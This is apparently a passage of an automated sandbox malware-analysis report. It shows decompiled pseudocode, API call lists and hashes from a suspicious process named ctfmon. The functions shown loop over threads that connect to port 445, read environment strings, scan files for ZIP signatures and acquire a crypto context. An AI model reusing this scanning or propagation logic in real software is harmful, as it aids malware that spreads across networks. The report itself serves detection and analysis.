				void* _t28;

				_t24 = _a4;
				if(_t24 != 0) {
					InterlockedIncrement(0x996a48);
					_t11 = E0096B320(__ebx, _t24, _t24); // executed
					_t31 = _t11;
					if(_t11 != 0) {
						_push(__ebx);
						_push(__esi);
						_t19 = E00970A6E(__esi, _t31, 0x2c);
						_a4 = _t19;
						E00975C70(_t19, 0x20, _t24);
						_t28 = _t28 + 0x10;
						 *((intOrPtr*)(_t19 + 0x20)) = 0;
						 *((intOrPtr*)(_t19 + 0x24)) = 0;
						 *((intOrPtr*)(_t19 + 0x28)) =  *((intOrPtr*)(_t24 + 0x28));
						EnterCriticalSection(0x996a5c);
						if(E00966F70(0x995b80) != 0) {
							 *((intOrPtr*)( *0x995b9c +  *0x995ba0 * 4)) = _t19;
							 *0x995ba0 =  *0x995ba0 + 1;
						}
						LeaveCriticalSection(0x996a5c);
					}
					_push(0x2c);
					E00970AA1(_t24);
					return InterlockedDecrement(0x996a48);
				}
				return _t9;
			}









                                                0x0096b3c4
                                                0x0096b3c9
                                                0x0096b3d4
                                                0x0096b3dc
                                                0x0096b3e1
                                                0x0096b3e3
                                                0x0096b3e5
                                                0x0096b3e6
                                                0x0096b3f1
                                                0x0096b3f7
                                                0x0096b3fa
                                                0x0096b3ff
                                                0x0096b402
                                                0x0096b409
                                                0x0096b410
                                                0x0096b418
                                                0x0096b42a
                                                0x0096b437
                                                0x0096b43a
                                                0x0096b43a
                                                0x0096b445
                                                0x0096b44c
                                                0x0096b44d
                                                0x0096b450
                                                0x00000000
                                                0x0096b45d
                                                0x0096b465

                                                APIs
                                                • InterlockedIncrement.KERNEL32(00996A48), ref: 0096B3D4
                                                  • Part of subcall function 0096B320: socket.WS2_32(00000002,00000001,00000006), ref: 0096B33A
                                                  • Part of subcall function 0096B320: inet_addr.WS2_32(?), ref: 0096B351
                                                  • Part of subcall function 0096B320: htons.WS2_32(000001BD), ref: 0096B35F
                                                  • Part of subcall function 0096B320: connect.WS2_32(00000000,?,00000010), ref: 0096B370
                                                  • Part of subcall function 0096B320: closesocket.WS2_32(00000000), ref: 0096B37C
                                                • new.LIBCMT ref: 0096B3E9
                                                • EnterCriticalSection.KERNEL32(00996A5C), ref: 0096B418
                                                • LeaveCriticalSection.KERNEL32(00996A5C), ref: 0096B445
                                                • InterlockedDecrement.KERNEL32(00996A48), ref: 0096B45D
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalInterlockedSection$DecrementEnterIncrementLeaveclosesocketconnecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 2254562651-0
                                                • Opcode ID: 4b7812362ffdbe47d037f28f4f9ede1f380c034c04184655f23b202a901375c9
                                                • Instruction ID: a99142736f00bf2f6442b7c60a767211ff9e564c7828f3e545a01d850fee5900
                                                • Opcode Fuzzy Hash: 4b7812362ffdbe47d037f28f4f9ede1f380c034c04184655f23b202a901375c9
                                                • Instruction Fuzzy Hash: C801F575240704EBDB106F58EC9AF6E3B68EFC97A9F464009FD0D5B392DB7288049B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097AF7A Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E0097AF7A() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t8;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0097AF43(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E00977882(_t19, _t7); // executed
						_t25 = _t8;
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00977848(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}













                                                0x0097af89
                                                0x0097af8f
                                                0x0097afe7
                                                0x0097afe7
                                                0x0097af91
                                                0x0097af92
                                                0x0097af97
                                                0x0097afa0
                                                0x0097afa6
                                                0x0097afac
                                                0x0097afb1
                                                0x00000000
                                                0x0097afb3
                                                0x0097afb4
                                                0x0097afb9
                                                0x0097afbe
                                                0x0097afdc
                                                0x0097afd6
                                                0x0097afd6
                                                0x0097afd8
                                                0x0097afd8
                                                0x0097afdf
                                                0x0097afe4
                                                0x0097afb1
                                                0x0097afeb
                                                0x0097afee
                                                0x0097afee
                                                0x0097affc

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0097AF83
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0097AFA6
                                                  • Part of subcall function 00977882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0097AFCC
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0097AFEE
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                • String ID:
                                                • API String ID: 1794362364-0
                                                • Opcode ID: 428c80afeb50935ccdb910e705556d45a989156fbf9f8a2d8800010e6f035f74
                                                • Instruction ID: 7acaaa15b36dce6d9f02563728296bb92ecc42d2bb91b61ed58fa1e815c9dec0
                                                • Opcode Fuzzy Hash: 428c80afeb50935ccdb910e705556d45a989156fbf9f8a2d8800010e6f035f74
                                                • Instruction Fuzzy Hash: 1101A7B36196157F67211AB65C8CD7F796DDEC6FA13154129F90CC6200EF648D0292F2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096E0D0 Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0096E0D0(CHAR* __ecx, long* _a8) {
				void* _v8;
				void* __esi;
				void* _t12;
				long _t13;
				void* _t15;
				long _t17;
				signed int _t19;
				signed int _t20;
				long* _t24;
				void* _t27;
				char* _t28;

				_push(__ecx);
				_t24 = _a8;
				 *_t24 = 0; // executed
				_t12 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v8 = _t12;
				if(_t12 != 0xffffffff) {
					_push(_t19);
					_push(_t27);
					_t13 = SetFilePointer(_t12, 0, 0, 1); // executed
					__eflags = _t13 - 0xffffffff;
					_t20 = _t19 & 0xffffff00 | __eflags != 0x00000000;
					_t28 = E00970A6E(_t27, __eflags, 0x20);
					_t15 = _v8;
					 *_t28 = 1;
					 *((char*)(_t28 + 0x10)) = 1;
					 *(_t28 + 1) = _t20;
					 *(_t28 + 4) = _t15;
					 *((char*)(_t28 + 8)) = 0;
					 *(_t28 + 0xc) = 0;
					__eflags = _t20;
					if(_t20 != 0) {
						_t17 = SetFilePointer(_t15, 0, 0, 1); // executed
						 *(_t28 + 0xc) = _t17;
					}
					 *_t24 = 0;
					return _t28;
				} else {
					 *_t24 = 0x200;
					return 0;
				}
			}














                                                0x0096e0d3
                                                0x0096e0d5
                                                0x0096e0eb
                                                0x0096e0f1
                                                0x0096e0f7
                                                0x0096e0fd
                                                0x0096e10c
                                                0x0096e10d
                                                0x0096e115
                                                0x0096e11b
                                                0x0096e120
                                                0x0096e128
                                                0x0096e12d
                                                0x0096e130
                                                0x0096e133
                                                0x0096e137
                                                0x0096e13a
                                                0x0096e13d
                                                0x0096e141
                                                0x0096e148
                                                0x0096e14a
                                                0x0096e153
                                                0x0096e159
                                                0x0096e159
                                                0x0096e15e
                                                0x0096e16a
                                                0x0096e0ff
                                                0x0096e0ff
                                                0x0096e10b
                                                0x0096e10b

                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000140,?,?,0096F440,00000141,FFFFFFFF,?,0096FFE1,?), ref: 0096E0F1
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000001,?,0096F440,00000141,FFFFFFFF,?,0096FFE1,?,?,00000244,35554C2F), ref: 0096E115
                                                • new.LIBCMT ref: 0096E123
                                                • SetFilePointer.KERNELBASE(FFFFFFFF,00000000,00000000,00000001), ref: 0096E153
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$Pointer$Create
                                                • String ID:
                                                • API String ID: 250661774-0
                                                • Opcode ID: 51ab48269e8bf3db568621bf7daa85ab5fa2cdff7f2b072c1dc62d5e8e3f927c
                                                • Instruction ID: bc9bc53e16c29adcf0ca5f58af3bbd381695eaf6c798e142ee27db37262fd3e0
                                                • Opcode Fuzzy Hash: 51ab48269e8bf3db568621bf7daa85ab5fa2cdff7f2b072c1dc62d5e8e3f927c
                                                • Instruction Fuzzy Hash: FD11C47169C301BBF7308F68DC0AB46BBD89B11720F208649FA98EB3C0D3F6A9448754
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096B470 Relevance: 6.0, APIs: 4, Instructions: 32sleepthreadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0096B470() {
				void* _v8;

				 *0x996a48 = 0;
				L1:
				if( *0x996a48 < 0x40) {
					_v8 = 0;
					if(E0096B660( &_v8) != 1) {
						CreateThread(0, 0, E0096B3C0, _v8, 0, 0); // executed
						Sleep(0xa); // executed
					} else {
						Sleep(0x1e); // executed
					}
				} else {
					Sleep(0x12c);
				}
				goto L1;
			}




                                                0x0096b482
                                                0x0096b490
                                                0x0096b497
                                                0x0096b4a5
                                                0x0096b4b4
                                                0x0096b4cc
                                                0x0096b4d0
                                                0x0096b4b6
                                                0x0096b4b8
                                                0x0096b4b8
                                                0x0096b499
                                                0x0096b49e
                                                0x0096b49e
                                                0x00000000

                                                APIs
                                                • Sleep.KERNEL32(0000012C), ref: 0096B49E
                                                • Sleep.KERNELBASE(0000001E), ref: 0096B4B8
                                                • CreateThread.KERNELBASE(00000000,00000000,0096B3C0,00000000,00000000,00000000), ref: 0096B4CC
                                                • Sleep.KERNELBASE(0000000A), ref: 0096B4D0
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Sleep$CreateThread
                                                • String ID:
                                                • API String ID: 3220764680-0
                                                • Opcode ID: 24e18c13ad9b54ae42d4fada87c52a1a9a1c3d360d03b3ee7df40061fdbed8b1
                                                • Instruction ID: 7fb2875aeadb78c9e1af2f92478d775e390fc2841d6a8ad7ae05f1a3582bf7bd
                                                • Opcode Fuzzy Hash: 24e18c13ad9b54ae42d4fada87c52a1a9a1c3d360d03b3ee7df40061fdbed8b1
                                                • Instruction Fuzzy Hash: EFF0A73159530CFBE610AF91DC42F5DBB68AB45710F214015E208B62E1ABF46984ABA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096FF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E0096FF70(void* __eflags) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t12;
				intOrPtr _t16;
				intOrPtr* _t17;
				void* _t20;
				intOrPtr* _t28;
				signed int _t35;

				_push(0xffffffff);
				_push(E009847B2);
				_push( *[fs:0x0]);
				_push(_t20);
				_t12 =  *0x98f008; // 0x35554c2f
				_push(_t12 ^ _t35);
				 *[fs:0x0] =  &_v16;
				_t32 = _t20;
				_t28 = E00970A6E(_t20, __eflags, 0x244);
				_v20 = _t28;
				_push(_t20);
				_t21 = _t28;
				 *_t28 = 0;
				 *((intOrPtr*)(_t28 + 4)) = 0xffffffff;
				 *((intOrPtr*)(_t28 + 0x134)) = 0xffffffff;
				 *((intOrPtr*)(_t28 + 0x138)) = 0;
				 *((intOrPtr*)(_t28 + 0x13c)) = 0;
				_v8 = 0xffffffff;
				_t16 = E0096F3D0(_t28, _t28, _t32); // executed
				 *0x996a4c = _t16;
				if(_t16 == 0) {
					_t17 = E00970A6E(_t32, __eflags, 8);
					 *_t17 = 1;
					 *((intOrPtr*)(_t17 + 4)) = _t28;
					 *[fs:0x0] = _v16;
					return _t17;
				} else {
					E00970030(_t28, _t21);
					 *[fs:0x0] = _v16;
					return 0;
				}
			}















                                                0x0096ff73
                                                0x0096ff75
                                                0x0096ff80
                                                0x0096ff81
                                                0x0096ff84
                                                0x0096ff8b
                                                0x0096ff8f
                                                0x0096ff95
                                                0x0096ffa1
                                                0x0096ffa3
                                                0x0096ffa6
                                                0x0096ffa8
                                                0x0096ffaa
                                                0x0096ffb0
                                                0x0096ffb7
                                                0x0096ffc1
                                                0x0096ffcb
                                                0x0096ffd5
                                                0x0096ffdc
                                                0x0096ffe1
                                                0x0096ffe8
                                                0x00970007
                                                0x0097000f
                                                0x00970015
                                                0x0097001b
                                                0x00970028
                                                0x0096ffea
                                                0x0096ffed
                                                0x0096fff7
                                                0x00970004
                                                0x00970004

                                                APIs
                                                • new.LIBCMT ref: 0096FF9C
                                                  • Part of subcall function 0096F3D0: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0096FFE1,?,?,00000244,35554C2F,?,?,?,35554C2F,009847B2), ref: 0096F3F7
                                                • new.LIBCMT ref: 00970007
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID: /LU5/
                                                • API String ID: 1611563598-937868281
                                                • Opcode ID: 5413829cfa6b068e4089b2e78a24f2128accfaa037b1fb17be502b8d52747a54
                                                • Instruction ID: f1a29c463061125546bbea467858a79399466ad6789448c7f7f660b221e0dff6
                                                • Opcode Fuzzy Hash: 5413829cfa6b068e4089b2e78a24f2128accfaa037b1fb17be502b8d52747a54
                                                • Instruction Fuzzy Hash: B71151B2605645EFD714DF59D806B9AF7E8FB85730F10836AE429877C0EBB56500CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096E170 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0096E170(char* __ecx, long __edx, LONG* _a4) {
				LONG* _t13;
				LONG* _t19;

				if( *__ecx == 0) {
					_t13 = _a4;
					if(_t13 != 0) {
						if(_t13 != 1) {
							if(_t13 == 2) {
								 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x18)) + __edx;
							}
							return 0;
						} else {
							 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + __edx;
							return 0;
						}
					} else {
						 *((intOrPtr*)(__ecx + 0x1c)) = __edx;
						return _t13;
					}
				} else {
					if( *((char*)(__ecx + 1)) == 0) {
						return 0x1d;
					} else {
						_t19 = _a4;
						if(_t19 != 0) {
							if(_t19 != 1) {
								if(_t19 != 2) {
									return 0x13;
								} else {
									SetFilePointer( *(__ecx + 4), __edx, 0, _t19); // executed
									return 0;
								}
							} else {
								SetFilePointer( *(__ecx + 4), __edx, 0, _t19);
								return 0;
							}
						} else {
							SetFilePointer( *(__ecx + 4),  *((intOrPtr*)(__ecx + 0xc)) + __edx, _t19, _t19); // executed
							return 0;
						}
					}
				}
			}





                                                0x0096e176
                                                0x0096e1d4
                                                0x0096e1d9
                                                0x0096e1e3
                                                0x0096e1ef
                                                0x0096e1f6
                                                0x0096e1f6
                                                0x0096e1fc
                                                0x0096e1e5
                                                0x0096e1e5
                                                0x0096e1eb
                                                0x0096e1eb
                                                0x0096e1db
                                                0x0096e1db
                                                0x0096e1df
                                                0x0096e1df
                                                0x0096e178
                                                0x0096e17c
                                                0x0096e1d3
                                                0x0096e17e
                                                0x0096e17e
                                                0x0096e183
                                                0x0096e19d
                                                0x0096e1b3
                                                0x0096e1cc
                                                0x0096e1b5
                                                0x0096e1bc
                                                0x0096e1c5
                                                0x0096e1c5
                                                0x0096e19f
                                                0x0096e1a6
                                                0x0096e1af
                                                0x0096e1af
                                                0x0096e185
                                                0x0096e190
                                                0x0096e199
                                                0x0096e199
                                                0x0096e183
                                                0x0096e17c

                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0096E3D2,00000002,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E190
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,0096E3D2,00000002,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E1A6
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 8fe916858411765370dc23ed1b8e04af2c43052ef1ada80fce1ad931d0f35ce7
                                                • Instruction ID: 2acd85673fd0cc51b8b543a0d6831b442145aebbf80c95cb6b6cc9bbfdc9a7f9
                                                • Opcode Fuzzy Hash: 8fe916858411765370dc23ed1b8e04af2c43052ef1ada80fce1ad931d0f35ce7
                                                • Instruction Fuzzy Hash: D1116D7164C1046FEB20CF64EC45B363BDDEB96328F2988A9F40CC9551E233CC56AB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096E3C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E0096E3C0(char* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t46;
				signed int _t48;
				intOrPtr _t49;
				long _t54;
				struct _OVERLAPPED* _t55;
				signed int _t58;
				void* _t60;
				intOrPtr _t61;
				int _t63;
				long _t65;
				intOrPtr* _t67;
				intOrPtr _t69;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t84;
				long _t87;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;

				_t68 = __ecx;
				_t67 = __ecx; // executed
				_t46 = E0096E170(__ecx, 0, 2); // executed
				_t95 = _t94 + 4;
				if(_t46 == 0) {
					if( *__ecx == 0) {
						_t84 =  *((intOrPtr*)(__ecx + 0x1c));
						goto L7;
					} else {
						if( *((char*)(__ecx + 1)) == 0) {
							_t84 = 0;
							_v16 = 0;
							goto L8;
						} else {
							_t65 = SetFilePointer( *(__ecx + 4), 0, 0, 1); // executed
							_t84 = _t65 -  *((intOrPtr*)(_t67 + 0xc));
							L7:
							_v16 = _t84;
							_v12 = 0xffff;
							if(_t84 < 0xffff) {
								L8:
								_v12 = _t84;
							}
						}
					}
					_push(0x404);
					_t48 = E00975A3B(_t68);
					_t91 = _t48;
					_t96 = _t95 + 4;
					if(_t91 != 0) {
						_t69 = _v12;
						_t49 = 4;
						_v8 = 0xffffffff;
						if(_t69 > 4) {
							while(1) {
								_t78 =  >  ? _t69 : _t49 + 0x400;
								_t54 = _t84 - _t78;
								_v32 = _t78;
								_v28 = _t54;
								_t87 =  >  ? 0x404 : _t84 - _t54;
								_t55 = E0096E170(_t67, _t54, 0); // executed
								_t96 = _t96 + 4;
								if(_t55 != 0) {
									goto L31;
								}
								_t72 = _t87;
								_v20 = _t87;
								if( *_t67 == _t55) {
									_t80 =  *((intOrPtr*)(_t67 + 0x1c));
									if(_t80 + _t87 >  *((intOrPtr*)(_t67 + 0x18))) {
										_t72 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
										_v20 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
									}
									E00983DB0(_t91,  *((intOrPtr*)(_t67 + 0x14)) + _t80, _t72);
									_t58 = _v20;
									_t96 = _t96 + 0xc;
									 *((intOrPtr*)(_t67 + 0x1c)) =  *((intOrPtr*)(_t67 + 0x1c)) + _t58;
								} else {
									_t63 = ReadFile( *(_t67 + 4), _t91, _t87,  &_v24, _t55); // executed
									if(_t63 == 0) {
										 *((char*)(_t67 + 8)) = 1;
									}
									_t58 = _v24;
								}
								if(_t58 / _t87 == 1) {
									_t60 = _t87 - 3;
									if(_t60 < 0) {
										L28:
										_t61 = _v8;
									} else {
										while(1) {
											_t60 = _t60 - 1;
											if( *((char*)(_t60 + _t91)) == 0x50 &&  *((char*)(_t60 + _t91 + 1)) == 0x4b &&  *((char*)(_t60 + _t91 + 2)) == 5 &&  *((char*)(_t60 + _t91 + 3)) == 6) {
												break;
											}
											if(_t60 >= 0) {
												continue;
											} else {
												goto L28;
											}
											goto L29;
										}
										_t61 = _t60 + _v28;
										_v8 = _t61;
									}
									L29:
									if(_t61 == 0) {
										_t69 = _v12;
										_t49 = _v32;
										_t84 = _v16;
										if(_t49 < _t69) {
											continue;
										}
									}
								}
								goto L31;
							}
						}
						L31:
						L00975A36(_t91);
						return _v8;
					} else {
						return _t48 | 0xffffffff;
					}
				} else {
					return _t46 | 0xffffffff;
				}
			}






























                                                0x0096e3c0
                                                0x0096e3cb
                                                0x0096e3cd
                                                0x0096e3d2
                                                0x0096e3d7
                                                0x0096e3e5
                                                0x0096e40a
                                                0x00000000
                                                0x0096e3e7
                                                0x0096e3eb
                                                0x0096e403
                                                0x0096e405
                                                0x00000000
                                                0x0096e3ed
                                                0x0096e3f6
                                                0x0096e3fe
                                                0x0096e40d
                                                0x0096e412
                                                0x0096e415
                                                0x0096e41a
                                                0x0096e41c
                                                0x0096e41c
                                                0x0096e41c
                                                0x0096e41a
                                                0x0096e3eb
                                                0x0096e420
                                                0x0096e425
                                                0x0096e42a
                                                0x0096e42c
                                                0x0096e431
                                                0x0096e43d
                                                0x0096e440
                                                0x0096e445
                                                0x0096e44e
                                                0x0096e454
                                                0x0096e45f
                                                0x0096e467
                                                0x0096e469
                                                0x0096e46e
                                                0x0096e47b
                                                0x0096e480
                                                0x0096e485
                                                0x0096e48a
                                                0x00000000
                                                0x00000000
                                                0x0096e490
                                                0x0096e492
                                                0x0096e497
                                                0x0096e4b6
                                                0x0096e4bf
                                                0x0096e4c4
                                                0x0096e4c6
                                                0x0096e4c6
                                                0x0096e4d1
                                                0x0096e4d6
                                                0x0096e4d9
                                                0x0096e4dc
                                                0x0096e499
                                                0x0096e4a3
                                                0x0096e4ab
                                                0x0096e4ad
                                                0x0096e4ad
                                                0x0096e4b1
                                                0x0096e4b1
                                                0x0096e4e6
                                                0x0096e4e8
                                                0x0096e4ed
                                                0x0096e510
                                                0x0096e510
                                                0x0096e4f0
                                                0x0096e4f0
                                                0x0096e4f0
                                                0x0096e4f5
                                                0x00000000
                                                0x00000000
                                                0x0096e50e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096e50e
                                                0x0096e53b
                                                0x0096e53e
                                                0x0096e53e
                                                0x0096e513
                                                0x0096e515
                                                0x0096e517
                                                0x0096e51a
                                                0x0096e51d
                                                0x0096e522
                                                0x00000000
                                                0x00000000
                                                0x0096e522
                                                0x0096e515
                                                0x00000000
                                                0x0096e4e6
                                                0x0096e454
                                                0x0096e528
                                                0x0096e529
                                                0x0096e53a
                                                0x0096e433
                                                0x0096e43c
                                                0x0096e43c
                                                0x0096e3d9
                                                0x0096e3e0
                                                0x0096e3e0

                                                APIs
                                                  • Part of subcall function 0096E170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0096E3D2,00000002,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E190
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00000000,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E3F6
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 854cca4e0e6f4d366369c8f1d84792a8d21e388965e4c9a9ce443370be58468f
                                                • Instruction ID: 7e0a8d216596da5d02635a592b0826be00a6d88478cf3eb99d6a47e403c60764
                                                • Opcode Fuzzy Hash: 854cca4e0e6f4d366369c8f1d84792a8d21e388965e4c9a9ce443370be58468f
                                                • Instruction Fuzzy Hash: 504115B4F042059FEF24CF78D88477E7BA99F81314F1481B9E90ADB292EA30DD418B41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00977848 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00977848(void* _a4) {
				char _t3;
				intOrPtr* _t4;
				intOrPtr _t6;

				if(_a4 != 0) {
					_t3 = RtlFreeHeap( *0x9967f4, 0, _a4); // executed
					if(_t3 == 0) {
						_t4 = E00975D43();
						_t6 = E00975CCA(GetLastError());
						 *_t4 = _t6;
						return _t6;
					}
				}
				return _t3;
			}






                                                0x00977851
                                                0x0097785e
                                                0x00977866
                                                0x00977869
                                                0x00977877
                                                0x0097787d
                                                0x00000000
                                                0x0097787f
                                                0x00977866
                                                0x00977881

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,0097C333,?,00000000,?,00000000,?,0097C35A,?,00000007,?,?,0097C757,?), ref: 0097785E
                                                • GetLastError.KERNEL32(?,?,0097C333,?,00000000,?,00000000,?,0097C35A,?,00000007,?,?,0097C757,?,?), ref: 00977870
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 485612231-0
                                                • Opcode ID: 70f2c6b37cd6806ec393b8b1e21863664fd3f5de3b9e5c5c601a7d4205cb6d9c
                                                • Instruction ID: 500c169c202eafe3719d0bc9cf539cc9d7c76734ac6aff5f9086ffad442043be
                                                • Opcode Fuzzy Hash: 70f2c6b37cd6806ec393b8b1e21863664fd3f5de3b9e5c5c601a7d4205cb6d9c
                                                • Instruction Fuzzy Hash: B3E0C233018B04ABCB252FE8EC0DB997BDCEF40354F158034FA4C9A261DAB49880E7C8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009648B0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E009648B0(intOrPtr* __ecx) {
				void* _t8;
				void* _t11;
				void* _t18;
				intOrPtr* _t19;

				_t19 = __ecx;
				_t15 =  *((intOrPtr*)( *__ecx + 0xc)) + 0x50;
				_t8 = LocalAlloc(0x40,  *((intOrPtr*)( *__ecx + 0xc)) + 0x50); // executed
				_t20 =  *_t19;
				_t18 = _t8;
				asm("movups xmm0, [esi]");
				_t2 = _t18 + 0x50; // 0x50
				asm("movups [edi], xmm0");
				asm("movups xmm0, [esi+0x10]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm0, [esi+0x20]");
				asm("movups [edi+0x20], xmm0");
				asm("movups xmm0, [esi+0x30]");
				asm("movups [edi+0x30], xmm0");
				asm("movups xmm0, [esi+0x40]");
				asm("movups [edi+0x40], xmm0");
				E00983DB0(_t2,  *((intOrPtr*)( *_t19 + 0x50)),  *((intOrPtr*)( *_t19 + 0xc)));
				_t11 = E00964920(_t18, _t15,  *((intOrPtr*)(_t20 + 0x54)),  *((intOrPtr*)(_t20 + 0x38))); // executed
				LocalFree(_t18); // executed
				return _t11;
			}







                                                0x009648b2
                                                0x009648ba
                                                0x009648c0
                                                0x009648c6
                                                0x009648c8
                                                0x009648ca
                                                0x009648cd
                                                0x009648d0
                                                0x009648d3
                                                0x009648d7
                                                0x009648db
                                                0x009648df
                                                0x009648e3
                                                0x009648e7
                                                0x009648eb
                                                0x009648ef
                                                0x009648fa
                                                0x00964907
                                                0x00964912
                                                0x0096491d

                                                APIs
                                                • LocalAlloc.KERNELBASE(00000040,?,?,00000000,-00000050,00964BCD), ref: 009648C0
                                                  • Part of subcall function 00964920: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 00964935
